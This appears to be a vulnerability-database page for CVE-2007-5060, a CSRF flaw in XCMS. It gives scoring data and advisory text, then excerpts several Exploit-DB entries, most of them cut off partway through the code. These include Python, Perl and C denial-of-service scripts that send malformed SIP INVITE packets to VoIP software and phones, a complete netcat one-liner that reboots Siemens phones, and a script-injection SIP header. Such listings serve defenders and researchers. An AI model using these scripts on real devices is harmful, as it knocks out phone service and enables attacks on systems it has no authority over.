CVE-2007-5060
published 2007-09-24CVE-2007-5060: Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index.php in XCMS allows remote attackers to change arbitrary…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
0.88%
54.6th percentile
Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index.php in XCMS allows remote attackers to change arbitrary passwords via certain password_ and rpassword_ parameters, possibly related to timestamp values.
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_cisco3.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7qh9-92w2-gfw9: Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index
ghsa_unreviewed·2022-05-01
CVE-2007-5060 [MEDIUM] CWE-352 GHSA-7qh9-92w2-gfw9: Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index
Cross-site request forgery (CSRF) vulnerability in the cpass functionality in an admin action in index.php in XCMS allows remote attackers to change arbitrary passwords via certain password_ and rpassword_ parameters, possibly related to timestamp values.
Cisco
SIP Packets Reload IOS Devices with support for SIP
vendor_cisco·2007-01-31·CVSS 3.3
CVE-2007-0648 [LOW] CWE-399 SIP Packets Reload IOS Devices with support for SIP
SIP Packets Reload IOS Devices with support for SIP
Cisco devices running an affected version of Internetwork Operating
System (IOS) which supports Session Initiation Protocol (SIP) are affected by a
vulnerability that may lead to a reload of the device when receiving a specific
series of packets destined to port 5060. This issue is compounded by a related
bug which allows traffic to TCP 5060 and UDP port 5060 on devices not
configured for SIP.
There are no known instances of intentional exploitation of this issue.
However, Cisco has observed data streams that appear to be unintentionally
triggering the vulnerability.
Workarounds exist to mitigate the effects of this problem on devices
which do not require SIP.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/con
Cisco
SIP Packets Reload IOS Devices with support for SIP
vendor_cisco
CVE-2007-0648 SIP Packets Reload IOS Devices with support for SIP
CVE-2007-0648: SIP Packets Reload IOS Devices with support for SIP
Cisco devices running an affected version of Internetwork Operating System (IOS) which supports Session Initiation Protocol (SIP) are affected by a vulnerability that may lead to a reload of the device when receiving a specific series of packets destined to port 5060. This issue is compounded by a related bug which allows traffic to TCP 5060 and UDP port 5060 on devices not configured for SIP. There are no known instances of intentional exploitation of this issue. However, Cisco has observed data streams that appear to be unintentionally triggering the vulnerability.
CWE: CWE-399, CWE-399
Bug IDs: CSCsb25337, CSCsh58082, CSCsh58082, CSCsb25337, CSCsh58082
No detection rules found.
Exploit-DB
OpenH323 Opal SIP Protocol - Remote Denial of Service
exploitdb·2009-07-24·CVSS 5.0
CVE-2007-4924 [MEDIUM] OpenH323 Opal SIP Protocol - Remote Denial of Service
OpenH323 Opal SIP Protocol - Remote Denial of Service
---
#!/usr/bin/env python
#
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)
#
# opal228_dos.py by Jose Miguel Esparza
# 2007-10-08 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:[email protected] SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:-40999990\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 192.168.1.133:5
Exploit-DB
Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
exploitdb·2009-07-24·CVSS 5.0
CVE-2007-4897 [MEDIUM] Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
---
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:417\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b7
Exploit-DB
Siemens C450IP/C475IP - Remote Denial of Service
exploitdb·2008-11-24
CVE-2008-7065 Siemens C450IP/C475IP - Remote Denial of Service
Siemens C450IP/C475IP - Remote Denial of Service
---
Hi,
echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060
Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.
Tested with current firmwares.
Vendor (Siemens) was contacted 11/2007, no fix supplied yet.
Have phun!
sky & Any
# milw0rm.com [2008-11-24]
Exploit-DB
Cisco Phone 7940 - Remote Denial of Service
exploitdb·2007-12-05
CVE-2007-5583 Cisco Phone 7940 - Remote Denial of Service
Cisco Phone 7940 - Remote Denial of Service
---
#!/usr/bin/perl
###############################
# Vulnerabily discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# http://madynes.loria.fr
###############################
use IO::Socket::INET;
use String::Random;
die "Usage $0 "
unless ($ARGV[3]);
$targetUser = $ARGV[1];
$targetIP = $ARGV[0];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2];
$socket=new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>$targetIP,
LocalPort=>5060);
$foo = new String::Random;
$flag = 0;
@calls;
$threads = 0;
while ($flag == 0){
$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";
$cseq = $foo->randregex('\d\d\d\d');
$msg = "
Exploit-DB
Linksys SPA941 - 'SIP From' HTML Injection
exploitdb·2007-10-09
CVE-2007-5411 Linksys SPA941 - 'SIP From' HTML Injection
Linksys SPA941 - 'SIP From' HTML Injection
---
source: https://www.securityfocus.com/bid/25987/info
Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Linksys SPA941 devices with firmware version 5.1.8 are vulnerable; other versions may also be affected.
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.1.9:5060;rport
To: sip:[email protected]
From: "alert('hack')""natraj" ;tag=002f
Exploit-DB
XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution
exploitdb·2007-09-22
CVE-2007-5060 XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution
XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution
---
source: https://www.securityfocus.com/bid/25771/info
Xcms is prone to a vulnerability that lets attackers execute arbitrary PHP code because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary malicious PHP code in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
-XCMS Arbitrary Command Execution Vuln by x0kster -
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - x0kster (at) gmail (dot) com [email concealed] ] -
Password :
Repete password :
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
Exploit-DB
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service
exploitdb·2007-03-25
CVE-2007-1561 Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service
---
#!/usr/bin/perl
# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[5]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n";
$socket->send($msg);
# milw0rm.com [2007-03-2
Exploit-DB
Asterisk 1.2.15/1.4.0 - Remote Denial of Service
exploitdb·2007-03-04
CVE-2007-1306 Asterisk 1.2.15/1.4.0 - Remote Denial of Service
Asterisk 1.2.15/1.4.0 - Remote Denial of Service
---
/*
this will cause asterisk to segfault,
the bug that this exploits has been patched in release 1.2.16 & 1.4.1
CLI>
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1082719152 (LWP 2510)]
register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0)
at chan_sip.c:8257
8257 while (*t && *t > ' ' && *t != ';')
(gdb)
build:
gcc -o asterisk-sip-killer asterisk-sip-killer.c
run:
./asterisk-sip-killer -h
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIP_UDP_PORT 5060
struct udp_session {
int sd;
struct sockaddr_in saddr;
};
int make_udp(struct udp_session *p, char *remotehost, int port)
{
int sd;
int ret;
struct sockaddr_in saddr;
struct hostent *he;
sd
No writeups or analysis indexed.
http://secunia.com/advisories/26941http://securityreason.com/securityalert/3165http://www.securityfocus.com/archive/1/480326/100/0/threadedhttp://www.securityfocus.com/bid/25771https://exchange.xforce.ibmcloud.com/vulnerabilities/36755http://secunia.com/advisories/26941http://securityreason.com/securityalert/3165http://www.securityfocus.com/archive/1/480326/100/0/threadedhttp://www.securityfocus.com/bid/25771https://exchange.xforce.ibmcloud.com/vulnerabilities/36755
2007-09-24
Published